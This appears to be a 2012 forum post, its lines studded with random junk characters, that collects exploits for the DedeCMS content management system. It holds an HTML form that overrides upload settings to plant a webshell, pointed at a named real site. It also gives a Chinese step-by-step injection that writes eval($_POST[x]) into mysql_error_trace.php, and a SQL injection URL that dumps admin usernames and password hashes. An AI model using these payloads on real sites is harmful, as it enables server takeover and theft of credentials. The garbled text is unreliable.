9 s( m0 b" e, _1 D& X9 R" l<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
- E- e3 J( m- M# O+ H m+ V6 ~</head>( O8 t2 z" k9 c, s) g j( v
<body style="FONT-SIZE: 9pt">
; d2 s G. C5 ~4 W; }3 M: c---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
, {0 g% a8 K! U5 ?<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>! \; j7 i6 i- x& |, \0 \# k0 E
<input type='hidden' name='activepath' value='/data/cache/' />' l: E4 p. ~1 |' D
<input type='hidden' name='cfg_basedir' value='../../' />' N' M' w; G. v
<input type='hidden' name='cfg_imgtype' value='php' />4 S c) q, S2 m* n' c( x8 q& \
<input type='hidden' name='cfg_not_allowall' value='txt' />, E+ a1 U, q' s) a
<input type='hidden' name='cfg_softtype' value='php' />4 U. I9 K, d$ Z, N. G* @6 B
<input type='hidden' name='cfg_mediatype' value='php' />
$ S" Z' [" [( E$ X) r v% H; M, d<input type='hidden' name='f' value='form1.enclosure' />
: }: t$ g. F, v; U<input type='hidden' name='job' value='upload' />
, _& g; \( C: k3 u6 X+ @$ A% U<input type='hidden' name='newname' value='fly.php' />
! I% Q( K% [ K2 I$ fSelect U Shell <input type='file' name='uploadfile' size='25' />) J0 H+ F) @# V" l/ x
<input type='submit' name='sb1' value='确定' />1 m, U: w9 P4 F& o0 A! Q
</form>+ Z- R* z' O* Y# E- K3 @
<br />It's just a exp for the bug of Dedecms V55...<br />
+ a, }) B4 N8 j7 k, z- {. tNeed register_globals = on...<br />
$ `8 V* ]6 P# R7 v( bFun the game,get a webshell at /data/cache/fly.php...<br />
2 J9 z5 ~* t, v0 T</body>* @) a8 R) N: I- _4 N
</html>4 Q3 D6 `- @( k; C# y
5 L' p5 c# b5 P! W, j7 x" A4 {4 v* ~7 _3 _+ W
3 K5 w5 n7 p& V( |
' i# k$ J9 i. b4 X; k# P% i$ o
1 Y- g6 h, Z2 z7 a$ I, N$ x
# w% @/ B/ E+ M( a( ^' P+ ?; [- v9 i$ [2 P4 d9 ^
5 @4 Q- G1 }: [+ r* r, `. ^2 W$ u9 M& M# n/ w
]& ^; K8 g/ C |% W+ L5 I, E
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞; t, p) {5 p4 L* w4 H, v
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
( N% |8 W7 B+ b1. 访问网址:( e" R/ Y7 ^; |, j) _, |
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>0 D" v5 j& e1 |5 n
可看见错误信息; j! \& z G' A) }
# X1 r6 v; _9 a' T7 _9 U. o
h' K8 H# V/ Q5 o7 q6 r3 R5 y2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
3 K8 x* [2 z$ o, x) [3 Wint(3) Error: Illegal double '1024e1024' value found during parsing
" j% Z1 Q0 B" s) l4 w1 e. ~Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
4 k' h! g6 P! i; n
" Z5 A' N3 P) p) n1 s
& L, N o* E0 y3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
L" T/ G+ g2 t* {7 f, p; j/ ]
, X. Q' V# F3 h! |6 b
' j% B$ H& i2 b }$ q* J+ B<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
1 l0 i7 q" e V
& A' r2 ]. I' d+ v2 B! M
$ Q9 E1 P) u3 D: J* S h! [按确定后的看到第2步骤的信息表示文件木马上传成功.
+ P$ C5 P8 A9 p( B! l
0 G9 j i1 k7 {; N
+ g* b% }8 Y3 B9 {" Y3 w" K+ ?+ r+ {+ u
" T. K' S9 R- C0 n0 m$ G7 v9 B" X$ p4 c6 x8 O% u
t$ N4 d8 Q m5 U! n' T4 |+ A
' x" E; ?9 o2 |0 p" M
9 u& p Y8 b" T n. b4 t
& i- t0 y" V7 m1 F3 H
# Y$ t) [1 f7 @9 Y' o; N- p+ ~
$ A" H9 l3 d7 U9 t3 v
" q1 e, \- `$ i' S( A( C织梦(DedeCms)plus/infosearch.php 文件注入漏洞
) \7 l8 \' ]7 @& [( i7 L V whttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对